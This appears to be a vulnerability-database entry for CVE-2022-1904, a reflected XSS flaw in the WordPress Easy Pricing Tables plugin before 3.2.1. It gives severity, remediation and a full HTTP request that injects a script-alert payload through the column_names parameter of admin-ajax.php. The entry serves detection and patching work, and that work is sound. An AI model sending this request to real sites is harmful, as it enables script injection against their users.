🔙 목록으로 돌아가기

CVE-2022-1904: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting

TitleWordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting
AuthorAkincibor
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.
RemediationUpdate to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability.
CVSS Score6.1
EPSS Score0.02188
CVE IDCVE-2022-1904
CWE IDCWE-79
Tags cve cve2022 wp wordpress wpscan wp-plugin xss fatcatapps vuln

🔍 Vulnerability Description

WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled.

🌐 HTTP Request

GET /wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1904.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1904.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A